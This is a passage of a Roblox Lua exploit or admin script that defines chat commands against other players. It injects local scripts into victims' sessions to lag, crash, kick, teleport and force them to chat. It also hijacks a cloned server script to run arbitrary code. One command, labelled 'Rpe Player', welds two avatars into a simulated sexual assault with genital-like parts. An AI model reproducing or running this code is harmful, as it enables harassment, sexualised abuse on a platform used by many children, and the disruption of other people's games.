  2590. t2 = game.Players[n2].Character.Torso
  2591. t2.Parent.Humanoid.PlatformStand = true
  2592. t1["Left Shoulder"]:Remove()
  2593. ls1 = Instance.new("Weld")
  2594. ls1.Parent = t1
  2595. ls1.Part0 = t1
  2596. ls1.Part1 = t1.Parent["Left Arm"]
  2597. ls1.C0 = CFrame.new(-1.5,0,0)
  2598. ls1.Name = "Left Shoulder"
  2599. t1["Right Shoulder"]:Remove()
  2600. rs1 = Instance.new("Weld")
  2601. rs1.Parent = t1
  2602. rs1.Part0 = t1
  2603. rs1.Part1 = t1.Parent["Right Arm"]
  2604. rs1.C0 = CFrame.new(1.5,0,0)
  2605. rs1.Name = "Right Shoulder"
  2606. t2["Left Shoulder"]:Remove()
  2607. ls2 = Instance.new("Weld")
  2608. ls2.Parent = t2
  2609. ls2.Part0 = t2
  2610. ls2.Part1 = t2.Parent["Left Arm"]
  2611. ls2.C0 = CFrame.new(-1.5,0,0)
  2612. ls2.Name = "Left Shoulder"
  2613. t2["Right Shoulder"]:Remove()
  2614. rs2 = Instance.new("Weld")
  2615. rs2.Parent = t2
  2616. rs2.Part0 = t2
  2617. rs2.Part1 = t2.Parent["Right Arm"]
  2618. rs2.C0 = CFrame.new(1.5,0,0)
  2619. rs2.Name = "Right Shoulder"
  2620. t2["Left Hip"]:Remove()
  2621. lh2 = Instance.new("Weld")
  2622. lh2.Parent = t2
  2623. lh2.Part0 = t2
  2624. lh2.Part1 = t2.Parent["Left Leg"]
  2625. lh2.C0 = CFrame.new(-0.5,-2,0)
  2626. lh2.Name = "Left Hip"
  2627. t2["Right Hip"]:Remove()
  2628. rh2 = Instance.new("Weld")
  2629. rh2.Parent = t2
  2630. rh2.Part0 = t2
  2631. rh2.Part1 = t2.Parent["Right Leg"]
  2632. rh2.C0 = CFrame.new(0.5,-2,0)
  2633. rh2.Name = "Right Hip"
  2634. local d = Instance.new("Part")
  2635. d.TopSurface = 0
  2636. d.BottomSurface = 0
  2637. d.CanCollide = false
  2638. d.BrickColor = BrickColor.new("Medium stone grey")
  2639. d.Shape = "Ball"
  2640. d.Parent = t1
  2641. d.Size = Vector3.new(1,1,1)
  2642. local dm = Instance.new("SpecialMesh")
  2643. dm.MeshType = "Sphere"
  2644. dm.Parent = d
  2645. dm.Scale = Vector3.new(0.4,0.4,0.4)
  2646. fWeld("weld",t1,t1,d,true,-0.2,-1.3,-0.6,0,0,0)
  2647. d2 = d:Clone()
  2648. d2.Parent = t1
  2649. fWeld("weld",t1,t1,d2,true,0.2,-1.3,-0.6,0,0,0)
  2650. local c = Instance.new("Part")
  2651. c.TopSurface = 0
  2652. c.BottomSurface = 0
  2653. c.CanCollide = false
  2654. c.BrickColor = BrickColor.new("Pastel brown")
  2655. c.Parent = t1
  2656. c.formFactor = "Custom"
  2657. c.Size = Vector3.new(0.4,1.3,0.4)
  2658. cm = Instance.new("CylinderMesh")
  2659. cm.Parent = c
  2660. a = fWeld("weld",t1,t1,c,true,0,-1,-0.52+(-c.Size.y/2),math.rad(-80),0,0)
  2661. c2 = d:Clone()
  2662. c2.BrickColor = BrickColor.new("Medium stone grey")
  2663. c2.Mesh.Scale = Vector3.new(0.4,0.62,0.4)
  2664. c2.Parent = t1
  2665. fWeld("weld",c,c,c2,true,0,0+(c.Size.y/2),0,math.rad(-10),0,0)
  2666. local bl = Instance.new("Part")
  2667. bl.TopSurface = 0
  2668. bl.BottomSurface = 0
  2669. bl.CanCollide = false
  2670. bl.BrickColor = BrickColor.new("Pastel brown")
  2671. bl.Shape = "Ball"
  2672. bl.Parent = t2
  2673. bl.Size = Vector3.new(1,1,1)
  2674. local dm = Instance.new("SpecialMesh")
  2675. dm.MeshType = "Sphere"
  2676. dm.Parent = bl
  2677. dm.Scale = Vector3.new(1.2,1.2,1.2)
  2678. fWeld("weld",t2,t2,bl,true,-0.5,0.5,-0.6,0,0,0)
  2679. local br = Instance.new("Part")
  2680. br.TopSurface = 0
  2681. br.BottomSurface = 0
  2682. br.CanCollide = false
  2683. br.BrickColor = BrickColor.new("Pastel brown")
  2684. br.Shape = "Ball"
  2685. br.Parent = t2
  2686. br.Size = Vector3.new(1,1,1)
  2687. local dm = Instance.new("SpecialMesh")
  2688. dm.MeshType = "Sphere"
  2689. dm.Parent = br
  2690. dm.Scale = Vector3.new(1.2,1.2,1.2)
  2691. fWeld("weld",t2,t2,br,true,0.5,0.5,-0.6,0,0,0)
  2692. local bln = Instance.new("Part")
  2693. bln.TopSurface = 0
  2694. bln.BottomSurface = 0
  2695. bln.CanCollide = false
  2696. bln.Shape = "Ball"
  2697. bln.Parent = t2
  2698. bln.Size = Vector3.new(1,1,1)
  2699. local dm = Instance.new("SpecialMesh")
  2700. dm.MeshType = "Sphere"
  2701. dm.Parent = bln
  2702. dm.Scale = Vector3.new(0.2,0.2,0.2)
  2703. fWeld("weld",t2,t2,bln,true,-0.5,0.5,-1.2,0,0,0)
  2704. local brn = Instance.new("Part")
  2705. brn.TopSurface = 0
  2706. brn.BottomSurface = 0
  2707. brn.CanCollide = false
  2708. brn.Shape = "Ball"
  2709. brn.Parent = t2
  2710. brn.Size = Vector3.new(1,1,1)
  2711. local dm = Instance.new("SpecialMesh")
  2712. dm.MeshType = "Sphere"
  2713. dm.Parent = brn
  2714. dm.Scale = Vector3.new(0.2,0.2,0.2)
  2715. fWeld("weld",t2,t2,brn,true,0.5,0.5,-1.2,0,0,0)
  2716. lh2.C1 = CFrame.new(0,-1.5,-0.5) * CFrame.Angles(0.9,-0.4,0)
  2717. rh2.C1 = CFrame.new(0,-1.5,-0.5) * CFrame.Angles(0.9,0.4,0)
  2718. ls2.C1 = CFrame.new(-0.5,-1.3,-0.5) * CFrame.Angles(0.9,-0.4,0)
  2719. rs2.C1 = CFrame.new(0.5,-1.3,-0.5) * CFrame.Angles(0.9,0.4,0)
  2720. ls1.C1 = CFrame.new(-0.5,0.7,0) * CFrame.Angles(-0.9,-0.4,0)
  2721. rs1.C1 = CFrame.new(0.5,0.7,0) * CFrame.Angles(-0.9,0.4,0)
  2722. if t1:findFirstChild("weldx") ~= nil then
  2723. t1.weldx:Remove()
  2724. end
  2725. we = fWeld("weldx", t1, t1, t2, true, 0, -0.9, -1.3, math.rad(-90), 0, 0)
  2726. n = t2.Neck
  2727. n.C0 = CFrame.new(0, 1.5, 0) * CFrame.Angles(math.rad(-210), math.rad(180), 0)
  2728. end)
  2729. coroutine.resume(coroutine.create(function()
  2730. while wait() do
  2731. for i = 1,6 do
  2732. we.C1 = we.C1 * CFrame.new(0,-0.3,0)
  2733. wait()
  2734. end
  2735.  
  2736. for i = 1,6 do
  2737. we.C1 = we.C1 * CFrame.new(0,0.3,0)
  2738. wait()
  2739. end
  2740. end
  2741. end))
  2742. end]]
  2743.  
  2744. Playerlist = {}
  2745.  
  2746. function NilCrash(Name)
  2747. local Crasher = Instance.new("StringValue")
  2748. Crasher.Name = "Client"
  2749. Crasher.Value = string.lower(tostring(Name))
  2750. Crasher.Parent = game:GetService("Lighting")
  2751. wait(1)
  2752. if Crasher and Crasher.Parent then
  2753. ypcall(function()
  2754. Crasher:Destroy()
  2755. end)
  2756. end
  2757. end
  2758.  
  2759.  
  2760.  
  2761.  
  2762.  
  2763. coroutine.resume(coroutine.create(function()
  2764. while wait(3) do
  2765. if game:GetService("Players").Name ~= "Players" then
  2766. game:GetService("Players").Name = "Players"
  2767. end
  2768. end
  2769. end))
  2770.  
  2771.  
  2772.  
  2773.  
  2774. function Dismiss()
  2775. for i = 1, 10 do
  2776. for i = 1, #Tabs do
  2777. table.remove(Tabs, i)
  2778. if tabmodel then
  2779. tabmodel:ClearAllChildren()
  2780. end end end
  2781. end
  2782.  
  2783. function DeleteSounds()
  2784. for _, v in ipairs(game.Workspace:GetChildren()) do
  2785. if v:IsA("Sound") then
  2786. v:Stop()
  2787. v.PlayOnRemove = false
  2788. wait()
  2789. v:Destroy()
  2790. end
  2791. end
  2792. end
  2793.  
  2794. function NewSound(ID)
  2795. DeleteSounds()
  2796. local Sound = Instance.new("Sound", game.Workspace)
  2797. Sound.SoundId = "http://www.roblox.com/asset/?id=" .. ID
  2798. Sound:Play()
  2799. end
  2800.  
  2801. function AddCmd(Name,Say,Desc,Func)
  2802. table.insert(Cmds,{["Name"] = Name,["Say"] = Say,["Desc"] = Desc,["Func"] = Func})
  2803. end
  2804.  
  2805. AddCmd("Musiclist", "mlist", "Lists available music", function()
  2806. Dismiss()
  2807. for k, v in pairs(Music) do
  2808. Output(k, function()
  2809. NewSound(v)
  2810. Dismiss()
  2811. end)
  2812. end
  2813. end)
  2814.  
  2815.  
  2816. AddCmd("Minipeep","mini","Makes you a minipeep", function(Players)
  2817. for _, Player in next, Players do
  2818. if Player:FindFirstChild("Backpack") then
  2819. NewLS(MiniPeepScript, Player.Backpack)
  2820. elseif Player:FindFirstChild("PlayerGui") then
  2821. NewLS(MiniPeepScript, Player.PlayerGui)
  2822. elseif Player.Character then
  2823. NewLS(MiniPeepScript, Player.Character)
  2824. end
  2825. end
  2826. end)
  2827.  
  2828.  
  2829. AddCmd("Rpe Player","rpe","Makes a player rpe another", function(Players, Message)
  2830. local Separator = Message:find(key)
  2831. Players = getPlayers(Message:sub(1, Separator - 1))
  2832. local RpePlayer = getPlayers(Message:sub(Separator + 1))
  2833. local Src = RpeScript.."; fun("..Players[1].Name..", "..RpePlayer[1].Name..")"
  2834. if Players[1]:FindFirstChild("Backpack") then
  2835. NewLS(Src, Players[1].Backpack)
  2836. elseif Players[1]:FindFirstChild("PlayerGui") then
  2837. NewLS(Src, Players[1].PlayerGui)
  2838. elseif Players[1].Character then
  2839. NewLS(Src, Players[1].Character)
  2840. end
  2841. end)
  2842.  
  2843.  
  2844. AddCmd("Banlist","bl","Show the banned players",
  2845. function()
  2846. Dismiss()
  2847. for i, v in pairs(Banlist) do
  2848. Output(v)
  2849. end
  2850. end
  2851. )
  2852.  
  2853. AddCmd("Fun","fun","Make some fun for a player",
  2854. function(plrs)
  2855. for _, plr in pairs(plrs) do
  2856. if plr and plr.Backpack then
  2857. NewLS(FunScript, plr.Backpack)
  2858. end
  2859. end
  2860. end
  2861. )
  2862.  
  2863.  
  2864.  
  2865. AddCmd("Lag player","lag","Lag a player",
  2866. function(plrs)
  2867. for _, plr in pairs(plrs) do
  2868. if plr and plr.Backpack then
  2869. NewLS(LagSource, plr.Backpack)
  2870. end
  2871. end
  2872. end
  2873. )
  2874.  
  2875.  
  2876. AddCmd("Nuke","nuke","Nuke a player",
  2877. function(plrs)
  2878. for _, plr in pairs(plrs) do
  2879. if plr and plr.Character then
  2880. a = Instance.new("Explosion", plr.Character)
  2881. a.Position = plr.Character.Torso
  2882. end
  2883. end
  2884. end
  2885. )
  2886.  
  2887. AddCmd("Night","night","Makes it night",
  2888. function()
  2889. game.Lighting.TimeOfDay = "00:00:00"
  2890. end
  2891. )
  2892.  
  2893. AddCmd("Day","day","Makes it day",
  2894. function()
  2895. game.Lighting.TimeOfDay = "12:00:00"
  2896. end
  2897. )
  2898.  
  2899. AddCmd("Fire","fire","Fire a player",
  2900. function(plrs)
  2901. for _, plr in pairs(plrs) do
  2902. if plr and plr.Character and plr.Character.Torso then
  2903. Instance.new("Fire", plr.Character.Torso)
  2904. end
  2905. end
  2906. end
  2907. )
  2908.  
  2909. AddCmd("Fix Lighting","lfix","Fix the Lighting ",
  2910. function()
  2911. function dtr()
  2912. local sk = game.Lighting:findFirstChild("Sky")
  2913. if sk ~= nil then
  2914. sk:Remove()
  2915. end
  2916. game.Lighting.FogEnd = 10011111111
  2917. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  2918. game.Lighting.TimeOfDay = "14:00:00"
  2919. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  2920. game.Lighting.Brightness = 1
  2921. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  2922. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  2923. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  2924. end
  2925.  
  2926. dtr()
  2927.  
  2928. game.Lighting.Changed:connect(dtr)
  2929. end
  2930. )
  2931.  
  2932. AddCmd("Set SkyBox","nud","et Skybox l0l",
  2933. function()
  2934. sky = Instance.new("Sky")
  2935. sky.Parent = game.Lighting
  2936. sky.SkyboxBk = "http://www.roblox.com/asset/?id=159478070"
  2937. sky.SkyboxDn = "http://www.roblox.com/asset/?id=159311254"
  2938. sky.SkyboxFt = "http://www.roblox.com/asset/?id=159311254"
  2939. sky.SkyboxLf = "http://www.roblox.com/asset/?id=159169666"
  2940. sky.SkyboxRt = "http://www.roblox.com/asset/?id=159169666"
  2941. sky.SkyboxUp = "http://www.roblox.com/asset/?id=159478070"
  2942. end
  2943. )
  2944.  
  2945. AddCmd("Admin a player","admin","Give admin to a player",
  2946. function(plrs)
  2947. for _, plr in pairs(plrs) do
  2948. if plr and plr.Backpack then
  2949. script.Parent = plr.Backpack
  2950.  
  2951. Output("You gave admin to: "..plr.Name, __)
  2952. end
  2953. end
  2954. end
  2955. )
  2956.  
  2957. AddCmd("Number of commands","ncmds","0var 9000 qq not rlly soon tho",
  2958. function()
  2959. Output(#Cmds, __)
  2960. end
  2961. )
  2962. AddCmd("FClean","fclean","Fully clear",
  2963. function()
  2964. for i,s in pairs(workspace:GetChildren()) do
  2965. if game:GetService("Players"):GetPlayerFromCharacter(s) == nil then
  2966. if s.className ~= "Terrain" then
  2967. if s.className ~= "Camera" then
  2968. pcall(function() s:Destroy() end)
  2969. end end end end
  2970. local b = Instance.new("Part", Game:GetService("Workspace"))
  2971. b.Size = Vector3.new(3000, 1, 3000)
  2972. b.CFrame = CFrame.new(0, 0, 0)
  2973. b.Name = "Base"
  2974. b.BrickColor = BrickColor.new("Earth green")
  2975. b.TopSurface = "Smooth"
  2976. b.BottomSurface = "Smooth"
  2977. b.LeftSurface = "Smooth"
  2978. b.RightSurface = "Smooth"
  2979. b.FrontSurface = "Smooth"
  2980. b.BackSurface = "Smooth"
  2981. b.Anchored = true
  2982. b.Locked = true
  2983. local sl = Instance.new("SpawnLocation", workspace)
  2984. sl.Anchored = true
  2985. sl.Locked = true
  2986. sl.formFactor = "Plate"
  2987. sl.Size = Vector3.new(6, 0.4, 6)
  2988. sl.CFrame = CFrame.new(0, 0.6, 0)
  2989. sl.BrickColor = BrickColor.new("Really blue")
  2990. sl.TopSurface = "Smooth"
  2991. sl.BottomSurface = "Smooth"
  2992. sl.LeftSurface = "Smooth"
  2993. sl.RightSurface = "Smooth"
  2994. sl.FrontSurface = "Smooth"
  2995. sl.BackSurface = "Smooth"
  2996. game.Lighting.FogEnd = 10011111111
  2997. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  2998. game.Lighting.TimeOfDay = "14:00:00"
  2999. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  3000. game.Lighting.Brightness = 1
  3001. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  3002. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  3003. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  3004. end
  3005. )
  3006.  
  3007. AddCmd("ek","ek","Epic Katana lel",
  3008. function()
  3009. x = game:GetService("InsertService"):LoadAsset(18017365) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  3010. x = game:GetService("InsertService"):LoadAsset(21294489) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  3011. x = game:GetService("InsertService"):LoadAsset(18776718) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  3012. x = game:GetService("InsertService"):LoadAsset(20577851) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  3013. x = game:GetService("InsertService"):LoadAsset(25545089) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  3014. x = game:GetService("InsertService"):LoadAsset(22787168) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  3015. end
  3016. )
  3017.  
  3018. AddCmd('Idiots','nilp','Find out on your own',
  3019. function(plrs,msg)
  3020. for _,v in pairs(Playerlist) do
  3021. if not game.Players[v.Name] then
  3022. Output('(NIL) '..v.Name, function() Output('NilCrash this person?', function() NilCrash(v.Name) end) end)
  3023. else
  3024. Output(v.Name,__)
  3025. end
  3026. end
  3027. end
  3028. )
  3029.  
  3030. AddCmd("Un-fire","unfire","Remove fire from player",
  3031. function(plrs)
  3032. for _, plr in pairs(plrs) do
  3033. if plr and plr.Character and plr.Character.Torso then
  3034. pcall(function()
  3035. for j, k in pairs(plr.Character.Torso:GetChildren()) do
  3036. if k:IsA("Fire") then
  3037. k:Destroy()
  3038. end
  3039. end
  3040. end)
  3041. end
  3042. end
  3043. end
  3044. )
  3045.  
  3046. found = false
  3047.  
  3048. coroutine.wrap(function()
  3049. while found == false do
  3050. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then break end
  3051. for _,scriptinworkspace in pairs(workspace:children()) do
  3052. if scriptinworkspace then
  3053. if scriptinworkspace:IsA("Script") then
  3054. if scriptinworkspace:FindFirstChild(SourceName) then
  3055. newScript = scriptinworkspace:Clone()
  3056. wait(0.2)
  3057. newScript.Name = "NewScript"
  3058. newScript.Disabled = true
  3059. newScript:FindFirstChild(SourceName).Value = ""
  3060. Output("Source found", __)
  3061. found = true
  3062. break
  3063. end
  3064. end
  3065. end
  3066. end
  3067. wait()
  3068. end
  3069. end)()
  3070.  
  3071. AddCmd("Unpunish player","unpunish","Restore the player's character",
  3072. function(plrs)
  3073. for _, plr in pairs(plrs) do
  3074. if plr then
  3075. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  3076. end
  3077. end
  3078. end
  3079. )
  3080.  
  3081. function NewS(sourcevalue, parent)
  3082. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  3083. NS(sourcevalue, parent)
  3084. else
  3085. if newScript then
  3086. local scr = newScript:Clone()
  3087. if scr:FindFirstChild(SourceName) then
  3088. if scr:FindFirstChild(SourceName) then
  3089. scr:FindFirstChild(SourceName).Value = sourcevalue
  3090. scr.Parent = parent
  3091. wait(0.5)
  3092. scr.Disabled = false
  3093. return scr
  3094. end
  3095. end
  3096. end
  3097. end
  3098. end
  3099.  
  3100. sorcery = script:Clone()
  3101.  
  3102. Services = {
  3103. game:GetService("Workspace"),
  3104. game:GetService("Players"),
  3105. game:GetService("Lighting"),
  3106. game:GetService("StarterPack"),
  3107. game:GetService("StarterGui"),
  3108. game:GetService("Teams"),
  3109. game:GetService("SoundService"),
  3110. game:GetService("Debris"),
  3111. game:GetService("InsertService"),
  3112. game:GetService("RunService"),
  3113. game:GetService("Chat"),
  3114. game:GetService("TeleportService"),
  3115. game:GetService("Geometry"),
  3116. game:GetService("MarketplaceService"),
  3117. game:GetService("BadgeService"),
  3118. game:GetService("NetworkClient"),
  3119. game:GetService("FriendService"),
  3120. }
  3121.  
  3122. function Explore(Item)
  3123. Dismiss()
  3124. if(Item==nil)then
  3125. for _,v in pairs(Services)do
  3126. Output(v.Name,function() Explore(v) end)
  3127. end;
  3128. else
  3129. f={
  3130. ['View children']=function()
  3131. Dismiss()
  3132. for _,v in pairs(Item:children())do
  3133. Output(v.Name,function()
  3134. Explore(v)
  3135. wait()
  3136. end);
  3137. end;
  3138. end;
  3139. ['View parent']=function()
  3140. Explore(Item.Parent)
  3141. end;
  3142. ['Destroy']=function()
  3143. Item:Destroy();
  3144. Explore(Item.Parent);
  3145. end;
  3146. ['Clear']=function()
  3147. Item:ClearAllChildren()
  3148. end;
  3149. ['Clone']=function()
  3150. pcall(function()
  3151. cloneableObj = Item:clone()
  3152. end)
  3153. end;
  3154. ['Remove']=function()
  3155. Item:remove()
  3156. end;
  3157. ['Paste']=function()
  3158. if cloneableObj then
  3159. cloneableObj.Parent = Item
  3160. end
  3161. end;
  3162. ['Ki'..'ck Item']=function()
  3163. NewLS("local plr = game:service'Players'.LocalPlayer; plr:Ki".."ck()", Item)
  3164. end;
  3165. };
  3166. for i,v in pairs(f)do
  3167. Output(tostring(i),v);
  3168. end;
  3169. Output('Item Name: \''..tostring(Item.Name)..'\'',nil);
  3170. Output('Class: \''..tostring(Item.ClassName)..'\'',nil);
  3171. if cloneableObj then
  3172. Output('Currently Cloning: \''..tostring(cloneableObj.Name)..'\'',nil);
  3173. end
  3174. end;
  3175. end;
  3176.  
  3177. AddCmd("Explore","explore","Explore the game",
  3178. function()
  3179. Explore()
  3180. end
  3181. )
  3182.  
  3183. function NewLS(sourcevalue, parent)
  3184. if game.PlaceId == 21053279 or game.PlaceId == 21053219 then
  3185. NLS(sourcevalue, parent)
  3186. else
  3187. local NS = sorcery:Clone()
  3188. NS.Name = "NewLocal"
  3189. local Source = NS:findFirstChild(SourceName)
  3190. if Source == nil then Instance.new('StringValue',NS).Name = SourceName end Source = NS:findFirstChild(SourceName)
  3191. Source.Value = sourcevalue
  3192. NS.Parent = parent
  3193. NS.Disabled = false
  3194. return NS
  3195. end
  3196. end
  3197.  
  3198. Clothes = {}
  3199.  
  3200. for _,Item in pairs(LocalPlayer.Character:GetChildren()) do
  3201. if Item:IsA('CharacterMesh') or Item:IsA('Hat') or Item:IsA('Shirt') or Item:IsA('Pants') then
  3202. table.insert(Clothes,Item:Clone())
  3203. end
  3204. end
  3205. for i,v in pairs(LocalPlayer.Character:GetChildren()) do
  3206. if v:IsA("BodyColors") then
  3207. body = v
  3208. torsocolor = body.TorsoColor
  3209. leftlegcolor = body.LeftLegColor
  3210. rightlegcolor = body.RightLegColor
  3211. leftarmcolor = body.LeftArmColor
  3212. rightarmcolor = body.RightArmColor
  3213. headcolor = body.HeadColor
  3214. end
  3215. end
  3216.  
  3217. mouse = LocalPlayer:GetMouse()
  3218.  
  3219. mouse.KeyDown:connect(function(key)
  3220. if key == "z" then
  3221. game:service'StarterGui':SetCoreGuiEnabled(4, true)
  3222. end
  3223. end)
  3224.  
  3225. AddCmd("Toogle ChatGUI","chat","Toogle ChatGUI on/off",
  3226. function(plrs, msg)
  3227. if msg == "off" then
  3228. chatgui = false
  3229. elseif msg == "on" then
  3230. chatgui = true
  3231. end
  3232. end
  3233. )
  3234.  
  3235. AddCmd("Set WalkSpeed","ws","Set the walkspeed of player",
  3236. function(plrs, msg)
  3237. local keypos = msg:find(key)
  3238. local targPlayers = msg:sub(1,keypos-1)
  3239. local plrs = getPlayers(targPlayers)
  3240. local speed = msg:sub(tonumber(keypos+1))
  3241. for _,v in pairs(plrs) do
  3242. if v.Character ~= nil and v.Character:findFirstChild("Humanoid") ~= nil then
  3243. v.Character:findFirstChild("Humanoid").WalkSpeed = speed
  3244. end
  3245. end
  3246. end
  3247. )
  3248.  
  3249.  
  3250.  
  3251. AddCmd("Teleport","tp","Teleport a player to a place",
  3252. function(plrs, msg)
  3253. local keypos = msg:find(key)
  3254. local targPlayers = msg:sub(1,keypos-1)
  3255. local plrs = getPlayers(targPlayers)
  3256. local id = msg:sub(tonumber(keypos+1))
  3257. for _,v in pairs(plrs) do
  3258. if v and v.Backpack then
  3259. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  3260. end
  3261. end
  3262. end
  3263. )
  3264.  
  3265.  
  3266. AddCmd("Chat","cht","Forces a player to chat ;)",
  3267. function(plrs, msg)
  3268. local keypos = msg:find(key)
  3269. local targPlayers = msg:sub(1,keypos-1)
  3270. local plrs = getPlayers(targPlayers)
  3271. local id = msg:sub(tonumber(keypos+1))
  3272. for _,v in pairs(plrs) do
  3273. if v and v.Backpack then
  3274. NewLS([==[game:service'Players':Chat(']==]..id..[==[')]==], v.Backpack)
  3275. end
  3276. end
  3277. end
  3278. )
  3279.  
  3280. Bad_Char = ""
  3281.  
  3282. function chatgui(msg)
  3283. if not chatgui then return end
  3284. if probemode == false then
  3285. if LocalPlayer.Character:findFirstChild("Head") then
  3286. mainPart = LocalPlayer.Character:findFirstChild("Head")
  3287. end
  3288. end
  3289. if probemode == true then
  3290. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  3291. mainPart = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe")
  3292. end
  3293. end
  3294. local bg = Instance.new("BillboardGui", mainPart)
  3295. bg.Adornee = mainPart
  3296. bg.Name = "CHATGUIBG"
  3297. bg.Size = UDim2.new(4, 0, 2.5, 0)
  3298. bg.StudsOffset = Vector3.new(-4, 2, 0)
  3299. local bg2 = Instance.new("BillboardGui", mainPart)
  3300. bg2.Adornee = mainPart
  3301. bg2.Name = "CHATGUIBG2"
  3302. bg2.Size = UDim2.new(4, 0, 2.5, 0)
  3303. bg2.StudsOffset = Vector3.new(-4, 4.5, 0)
  3304. local text = Instance.new("TextLabel", bg)
  3305. text.Size = UDim2.new(3, 0, 0.5, 0)
  3306. text.FontSize = "Size18"
  3307. text.TextScaled = true
  3308. text.TextTransparency = 0
  3309. text.BackgroundTransparency = 1
  3310. text.TextTransparency = 0
  3311. text.TextStrokeTransparency = 0
  3312. text.Font = "Arial"
  3313. text.TextColor = BrickColor.new("Institutional white")
  3314. text.Text = " "
  3315. Message = msg:sub(1)
  3316. if #Message >50 then return end
  3317. for i = 0, #Message, 1 do
  3318. wait(0.01)
  3319. text.Text = string.gsub("["..LocalPlayer.Name.."]: "..Message:sub(0, i),'fuck','fuck')
  3320. end
  3321. wait()
  3322. coroutine.resume(coroutine.create(function()
  3323. for i = 0, 5, 0.05 do
  3324. if bg ~= nil then
  3325. if bg2 ~= nil then
  3326. wait()
  3327. bg2.StudsOffset = bg2.StudsOffset + Vector3.new(0, 0.05, 0)
  3328. end
  3329. bg.StudsOffset = bg.StudsOffset + Vector3.new(0, 0.05, 0)
  3330. end
  3331. end
  3332. end))
  3333. for i=text.TextTransparency,1,0.02 do
  3334. wait()
  3335. text.TextTransparency = i
  3336. text.TextStrokeTransparency = i
  3337. end
  3338. if bg == nil then return end
  3339. bg:Destroy()
  3340. if bg2 == nil then return end
  3341. bg2:Destroy()
  3342. end
  3343.  
  3344. LocalPlayer.Chatted:connect(chatgui)
  3345.  
  3346. AddCmd("Message","m","Make a message over the screen",
  3347. function(plrs, msg)
  3348. Message = msg
  3349. NewS([[
  3350. a = Instance.new("Message", workspace)
  3351. a.Text = ]].."[ "..LocalPlayer.Name.." ]: "..Message, workspace)
  3352. end
  3353. )
  3354.  
  3355. AddCmd("Hint","h","Make a message at top of the screen",
  3356. function(plrs, msg)
  3357. Hint = msg
  3358. NewS([[
  3359. a = Instance.new("Hint", workspace)
  3360. a.Text = ]]..Hint, workspace)
  3361. end
  3362. )
  3363.  
  3364. AddCmd("Commands","cmds","Show the list of commands",
  3365. function()
  3366. Dismiss()
  3367. for i, v in pairs(Cmds) do
  3368. Output(v["Name"],
  3369. function()
  3370. Output("Description: "..v["Desc"], __)
  3371. Output("Usage: "..v["Say"], __)
  3372. Output("Name: "..v["Name"], __)
  3373. end)
  3374. end
  3375. end
  3376. )
  3377.  
  3378. AddCmd("Rejoin player","rej","Rejoin the player",
  3379. function(plrs)
  3380. for _, plr in pairs(plrs) do
  3381. if plr and plr.Backpack then
  3382. NewLS("game:service'TeleportService':Teleport(game.PlaceId)", plr.Backpack)
  3383. end
  3384. end
  3385. end
  3386. )
  3387.  
  3388. AddCmd("Create base","base","Create the base",
  3389. function()
  3390. a = Instance.new("Part")
  3391. a.Parent = Workspace
  3392. a.Name = "Base"
  3393. a.Position = Vector3.new(0, 0.6, 0)
  3394. a.Size = Vector3.new(1002, 0, 1002)
  3395. a.Material = "Grass"
  3396. a.Anchored = true
  3397. a.BrickColor = BrickColor.new("Dark green")
  3398. end
  3399. )
  3400.  
  3401. AddCmd("Ping","ping","Ping something",
  3402. function(plrs, msg)
  3403. if msg == "" then
  3404. Output("pong", __)
  3405. else
  3406. Output(msg, __)
  3407. end
  3408. end
  3409. )
  3410.  
  3411. AddCmd("Dismiss","dis","Dismiss tabs",
  3412. function()
  3413. Dismiss()
  3414. end
  3415. )
  3416.  
  3417. AddCmd("Probe mode", "probe", "Be a ball and fly around",
  3418. function()
  3419. probemode = true
  3420. Dismiss()
  3421. if LocalPlayer.Character then LocalPlayer.Character = nil end
  3422. if workspace.CurrentCamera == nil then return end
  3423. local camera = workspace.CurrentCamera
  3424. local probe = Instance.new("Part", workspace)
  3425. M = Instance.new("SpecialMesh", probe)
  3426. M.MeshId = "http://www.roblox.com/asset/?id=21057410"
  3427. M.TextureId = "http://www.roblox.com/asset/?id=35818216"
  3428. M.Scale = Vector3.new(2.50, 2.50, 2.50)
  3429. probe.TopSurface = 0
  3430. probe.Anchored = true
  3431. probe.BottomSurface = 0
  3432. probe.Name = LocalPlayer.Name.."'s probe"
  3433. local rotation = 0
  3434. local bbg = Instance.new("BillboardGui", probe)
  3435. bbg.Size = UDim2.new(3, 0, 3 ,0)
  3436. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  3437. local txt = Instance.new("TextLabel", bbg)
  3438. txt.FontSize = "Size24"
  3439. txt.Font = "SourceSansBold"
  3440. txt.Text = LocalPlayer.Name
  3441. txt.BackgroundTransparency = 1
  3442. txt.TextColor = BrickColor.new("Bright bluish green")
  3443. txt.TextStrokeTransparency = 0
  3444. txt.Size = UDim2.new(1,0,1,0)
  3445. local pl = Instance.new("PointLight", probe)
  3446. pl.Shadows = true
  3447. pl.Range = 20
  3448. coroutine.wrap(function()
  3449. while pl ~= nil do
  3450. pl.Color = Color3.new(math.random(), math.random(), math.random())
  3451. wait(0.8)
  3452. end
  3453. end)()
  3454. coroutine.wrap(function()
